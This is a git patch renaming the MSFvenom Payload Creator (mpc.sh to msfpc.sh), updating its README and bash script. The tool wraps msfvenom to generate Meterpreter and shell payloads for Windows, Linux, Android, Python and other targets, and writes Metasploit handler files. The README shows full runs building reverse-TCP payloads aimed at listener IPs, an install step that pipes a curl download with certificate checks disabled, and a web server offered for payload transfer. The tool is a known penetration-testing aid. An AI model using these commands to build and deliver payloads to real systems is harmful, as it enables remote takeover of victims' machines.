From f648fc308bb588d56a3d15d04cc78fba5106a413 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Fri, 9 Jun 2017 11:50:59 +0100 Subject: [PATCH] v1.4.4: mpc.sh -> msfpc.sh --- README.md | 122 ++++++++++++++++++++++++--------------------- mpc.sh => msfpc.sh | 24 +++++---- 2 files changed, 78 insertions(+), 68 deletions(-) rename mpc.sh => msfpc.sh (98%) mode change 100755 => 100644 diff --git a/README.md b/README.md index 0718066..ba15449 100644 --- a/README.md +++ b/README.md @@ -1,9 +1,9 @@ -## Msfvenom Payload Creator (MPC) +## MSFvenom Payload Creator (MSFPC) A **quick** way to generate various "basic" Meterpreter payloads via `msfvenom` (part of the Metasploit framework).

- mpc logo + msfpc logo

@@ -12,21 +12,21 @@ A **quick** way to generate various "basic" Meterpreter payloads via `msfvenom` ## About -Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as **simple as possible** (**only requiring one input**) to produce their payload. +MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as **simple as possible** (**only requiring one input**) to produce their payload. -**Fully automating** msfvenom & Metasploit is the end goal _(well as to be be able to automate MPC itself)_. +**Fully automating** msfvenom & Metasploit is the end goal _(well as to be be able to automate MSFPC itself)_. The rest is to make the user's life as **easy as possible** (e.g. **IP selection menu**, **msfconsole resource file/commands**, **batch payload production** and able to enter **any argument in any order** _(in various formats/patterns)_). The only necessary input from the user should be **defining the payload** they want by either the **platform** (e.g. `windows`), or the **file extension** they wish the payload to have (e.g. `exe`). * **Can't remember your IP for a interface? Don't sweat it, just use the interface name**: `eth0`. -* **Don't know what your external IP is? MPC will discover it**: `wan`. +* **Don't know what your external IP is? MSFPC will discover it**: `wan`. * **Want to generate one of each payload? No issue!** Try: `loop`. * **Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem**. Try: `batch` (for everything), `batch msf` (for every Meterpreter option), `batch staged` (for every staged payload), or `batch cmd stageless` (for every stageless command prompt)! _Note: This will **NOT** try to bypass any anti-virus solutions at any stage._ -![Msfvenom Payload Creator (MPC)](https://i.imgur.com/qxRwnYD.png) +![Msfvenom Payload Creator (MSFPC)](https://i.imgur.com/tN9q5iG.png) - - - @@ -34,18 +34,26 @@ _Note: This will **NOT** try to bypass any anti-virus solutions at any stage._ ## Install -+ Designed for **Kali Linux v2.x** & **Metasploit v4.11+**. ++ Designed for **Kali Linux v2.x/Rolling** & **Metasploit v4.11+**. + Kali v1.x should work. + OSX 10.11+ should work. + Weakerth4n 6+ should work. + _...nothing else has been tested._ ``` -curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc -chmod +x /usr/bin/mpc -mpc +$ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc +$ chmod 0755 /usr/local/bin/msfpc ``` +### Kali-Linux + +MSFPC is already [packaged](https://pkg.kali.org/pkg/msfpc) in [Kali Rolling](https://www.kali.org/), so all you have to-do is: + +```bash +root@kali:~# apt install -y msfpc +``` + + - - - @@ -53,18 +61,19 @@ mpc ## Help ``` -root@kali:~# mpc -h -v - [*] Msfvenom Payload Creator (MPC v1.4) +$ bash msfpc.sh -h -v + [*] MSFvenom Payload Creator (MSFPC v1.4.4) - /usr/bin/mpc () () () () () () () () - Example: /usr/bin/mpc windows 192.168.1.10 # Windows & manual IP. - /usr/bin/mpc elf bind eth0 4444 # Linux, eth0's IP & manual port. - /usr/bin/mpc stageless cmd py https # Python, stageless command prompt. - /usr/bin/mpc verbose loop eth1 # A payload for every type, using eth1's IP. - /usr/bin/mpc msf batch wan # All possible Meterpreter payloads, using WAN IP. - /usr/bin/mpc help verbose # Help screen, with even more information. + msfpc.sh () () () () () () () () + Example: msfpc.sh windows 192.168.1.10 # Windows & manual IP. + msfpc.sh elf bind eth0 4444 # Linux, eth0's IP & manual port. + msfpc.sh stageless cmd py https # Python, stageless command prompt. + msfpc.sh verbose loop eth1 # A payload for every type, using eth1's IP. + msfpc.sh msf batch wan # All possible Meterpreter payloads, using WAN IP. + msfpc.sh help verbose # Help screen, with even more information. : + + APK + ASP + ASPX + Bash [.sh] @@ -78,7 +87,7 @@ root@kali:~# mpc -h -v + Tomcat [.war] + Windows [.exe // .dll] - Rather than putting , you can do a interface and MPC will detect that IP address. + Rather than putting , you can do a interface and MSFPC will detect that IP address. Missing will default to the IP menu. Missing will default to 443. @@ -117,15 +126,15 @@ root@kali:~# mpc -h -v will just create one of each . will display more information. -root@kali:~# +$ ``` ## Example \#1 (Windows, Fully Automated Using Manual IP) ```bash -root@kali:~# bash mpc.sh windows 192.168.1.10 - [*] Msfvenom Payload Creator (MPC v1.4) +$ bash msfpc.sh windows 192.168.1.10 + [*] MSFvenom Payload Creator (MSFPC v1.4.4) [i] IP: 192.168.1.10 [i] PORT: 443 [i] TYPE: windows (windows/meterpreter/reverse_tcp) @@ -133,23 +142,22 @@ root@kali:~# bash mpc.sh windows 192.168.1.10 --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \ > '/root/windows-meterpreter-staged-reverse-tcp-443.exe' - [i] File (/root/windows-meterpreter-staged-reverse-tcp-443.exe) already exists. Overwriting... [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe' [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc' [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc' - [?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080 + [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080 [*] Done! -root@kali:~# +$ ``` ## Example \#2 (Linux Format, Fully Automated Using Manual Interface and Port) ```bash -root@kali:~# ./mpc.sh elf bind eth0 4444 verbose - [*] Msfvenom Payload Creator (MPC v1.4) - [i] IP: 192.168.103.183 +$ ./msfpc.sh elf bind eth0 4444 verbose + [*] MSFvenom Payload Creator (MSFPC v1.4.4) + [i] IP: 192.168.103.142 [i] PORT: 4444 [i] TYPE: linux (linux/x86/shell/bind_tcp) [i] SHELL: shell @@ -160,7 +168,6 @@ root@kali:~# ./mpc.sh elf bind eth0 4444 verbose --platform linux -a x86 -e generic/none LPORT=4444 \ > '/root/linux-shell-staged-bind-tcp-4444.elf' - [i] File (/root/linux-shell-staged-bind-tcp-4444.elf) already exists. Overwriting... [i] linux shell created: '/root/linux-shell-staged-bind-tcp-4444.elf' [i] File: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size @@ -170,39 +177,38 @@ root@kali:~# ./mpc.sh elf bind eth0 4444 verbose [i] MSF handler file: '/root/linux-shell-staged-bind-tcp-4444-elf.rc' [i] Run: msfconsole -q -r '/root/linux-shell-staged-bind-tcp-4444-elf.rc' - [?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080 + [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080 [*] Done! -root@kali:~# +$ ``` ## Example \#3 (Python Format, Interactive IP Menu) ```bash -root@kali:~# mpc stageless cmd py tcp - [*] Msfvenom Payload Creator (MPC v1.4) +$ msfpc stageless cmd py tcp + [*] MSFvenom Payload Creator (MSFPC v1.4.4) [i] Use which interface - IP address?: - [i] 1.) eth0 - 192.168.103.183 - [i] 2.) tap0 - 10.10.100.63 - [i] 3.) lo - 127.0.0.1 - [i] 4.) wan - xxx.xxx.xxx.xxx - [?] Select 1-4, interface or IP address: 2 + [i] 1.) eth0 - 192.168.103.142 + [i] 2.) lo - 127.0.0.1 + [i] 3.) wan - 31.204.154.174 + [?] Select 1-3, interface or IP address: 1 - [i] IP: 10.10.100.63 + [i] IP: 192.168.103.142 [i] PORT: 443 [i] TYPE: python (python/shell_reverse_tcp) [i] CMD: msfvenom -p python/shell_reverse_tcp -f raw \ - --platform python -e generic/none -a python LHOST=10.10.100.63 LPORT=443 \ + --platform python -e generic/none -a python LHOST=192.168.103.142 LPORT=443 \ > '/root/python-shell-stageless-reverse-tcp-443.py' [i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py' [i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc' [i] Run: msfconsole -q -r '/root/python-shell-stageless-reverse-tcp-443-py.rc' - [?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080 + [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080 [*] Done! -root@kali:~# +$ ``` _Note: Removed WAN IP._ @@ -211,37 +217,39 @@ _Note: Removed WAN IP._ ## Example \#4 (Loop - Generates one of everything) ```bash -root@kali:~# ./mpc.sh loop wan - [*] Msfvenom Payload Creator (MPC v1.4) +$ ./msfpc.sh loop wan + [*] MSFvenom Payload Creator (MSFPC v1.4.4) [i] Loop Mode. Creating one of each TYPE, with default values - [*] Msfvenom Payload Creator (MPC v1.4) + [*] MSFvenom Payload Creator (MSFPC v1.4.4) [i] IP: xxx.xxx.xxx.xxx [i] PORT: 443 - [i] TYPE: windows (windows/meterpreter/reverse_tcp) - [i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f asp \ - --platform windows -a x86 -e generic/none LHOST=xxx.xxx.xxx.xxx LPORT=443 \ - > '/root/windows-meterpreter-staged-reverse-tcp-443.asp' + [i] TYPE: android (android/meterpreter/reverse_tcp) + [i] CMD: msfvenom -p android/meterpreter/reverse_tcp \ + LHOST=xxx.xxx.xxx.xxx LPORT=443 \ + > '/root/android-meterpreter-stageless-reverse-tcp-443.apk' - [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.asp' + [i] android meterpreter created: '/root/android-meterpreter-stageless-reverse-tcp-443.apk' - [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-asp.rc' - [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-asp.rc' - [?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080 + [i] MSF handler file: '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc' + [i] Run: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc' + [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080 [*] Done! - [*] Msfvenom Payload Creator (MPC v1.4) + [*] MSFvenom Payload Creator (MSFPC v1.4.4) + ...SNIP... + [*] Done! -root@kali ~$ +$ ``` _Note: Removed WAN IP._ -![Examples](https://i.imgur.com/lQFiqil.png) +![Examples](https://i.imgur.com/8zPx6p3.png) - - - diff --git a/mpc.sh b/msfpc.sh old mode 100755 new mode 100644 similarity index 98% rename from mpc.sh rename to msfpc.sh index 1b45ae2..93e7ddd --- a/mpc.sh +++ b/msfpc.sh @@ -1,6 +1,6 @@ #!/bin/bash #-Metadata----------------------------------------------------# -# Filename: mpc.sh (v1.4.3) (Update: 2016-06-30) # +# Filename: msfpc.sh (v1.4.4) (Update: 2017-06-09) # #-Info--------------------------------------------------------# # Quickly generate Metasploit payloads using msfvenom. # #-Author(s)---------------------------------------------------# @@ -28,7 +28,7 @@ #-------------------------------------------------------------# #--Quick Install----------------------------------------------# -# curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc; chmod +x /usr/bin/mpc +# curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/bin/msfpc; chmod +x /usr/bin/msfpc #-------------------------------------------------------------# #-More information--------------------------------------------# @@ -119,7 +119,7 @@ function doAction { CMD=$(echo $CMD | sed 's/\\\\\n//g') [[ -e "${FILENAME}" ]] && echo -e " ${YELLOW}[i]${RESET} File (${FILENAME}) ${YELLOW}already exists${RESET}. ${YELLOW}Overwriting...${RESET}" && rm -f "${FILENAME}" - eval "${CMD}" 2>/tmp/mpc.out + eval "${CMD}" 2>/tmp/msfpc.out [[ ! -s "${FILENAME}" ]] && rm -f "${FILENAME}" if [[ -e "${FILENAME}" ]]; then echo -e " ${YELLOW}[i]${RESET} ${TYPE} ${SHELL} created: '${YELLOW}${FILENAME}${RESET}'" @@ -127,22 +127,22 @@ function doAction { \chmod +x "${FILENAME}" else echo "" - \grep -q 'Invalid Payload Selected' /tmp/mpc.out 2>/dev/null + \grep -q 'Invalid Payload Selected' /tmp/msfpc.out 2>/dev/null if [[ "$?" == '0' ]]; then echo -e "\n ${YELLOW}[i]${RESET} ${RED}Invalid Payload Selected${RESET} (Metasploit doesn't support this) =(" >&2 - \rm -f /tmp/mpc.out + \rm -f /tmp/msfpc.out else echo -e "\n ${YELLOW}[i]${RESET} Something went wrong. ${RED}Issue creating file${RESET} =(." >&2 echo -e "\n----------------------------------------------------------------------------------------" [ -e "/usr/share/metasploit-framework/build_rev.txt" ] && \cat /usr/share/metasploit-framework/build_rev.txt || \msfconsole -v \uname -a echo -e "----------------------------------------------------------------------------------------${RED}" - \cat /tmp/mpc.out + \cat /tmp/msfpc.out echo -e "${RESET}----------------------------------------------------------------------------------------\n" fi exit 2 fi - #\rm -f /tmp/mpc.out + #\rm -f /tmp/msfpc.out [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} File: $(\file -b ${FILENAME})" [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} Size: $(\du -h ${FILENAME} | \cut -f1)" @@ -155,13 +155,15 @@ function doAction { cat < "${FILEHANDLE}" # -# [Kali 2.x]: systemctl start postgresql; msfdb start; msfconsole -q -r '${FILEHANDLE}' +# [Kali 1]: service postgresql start; service metasploit start; msfconsole -q -r '${FILEHANDLE}' +# [Kali 2.x/Rolling]: msfdb start; msfconsole -q -r '${FILEHANDLE}' # use exploit/multi/handler set PAYLOAD ${PAYLOAD} set ${HOST} ${IP} set LPORT ${PORT} set ExitOnSession false +#set AutoRunScript 'post/windows/manage/migrate' run -j EOF @@ -197,7 +199,7 @@ function doHelp { echo -e " + ${YELLOW}Tomcat${RESET} [.${YELLOW}war${RESET}]" echo -e " + ${YELLOW}Windows${RESET} [.${YELLOW}exe${RESET} // .${YELLOW}dll${RESET}]" echo "" - echo -e " Rather than putting , you can do a interface and MPC will detect that IP address." + echo -e " Rather than putting , you can do a interface and MSFPC will detect that IP address." echo -e " Missing will default to the IP menu." echo "" echo -e " Missing will default to 443." @@ -244,7 +246,7 @@ function doHelp { ## Banner -echo -e " ${BLUE}[*]${RESET} ${BLUE}M${RESET}sfvenom ${BLUE}P${RESET}ayload ${BLUE}C${RESET}reator (${BLUE}MPC${RESET} v${BLUE}1.4.3${RESET})" +echo -e " ${BLUE}[*]${RESET} ${BLUE}MSF${RESET}venom ${BLUE}P${RESET}ayload ${BLUE}C${RESET}reator (${BLUE}MSFPC${RESET} v${BLUE}1.4.4${RESET})" ## Check system @@ -786,7 +788,7 @@ fi ##### Done! if [[ "${SUCCESS}" == true ]]; then - echo -e " ${GREEN}[?]${RESET} ${GREEN}Quick web server${RESET} (for file transfer)?: python -m SimpleHTTPServer 8080" + echo -e " ${GREEN}[?]${RESET} ${GREEN}Quick web server${RESET} (for file transfer)?: python2 -m SimpleHTTPServer 8080" echo -e " ${BLUE}[*]${RESET} ${BLUE}Done${RESET}!" else doHelp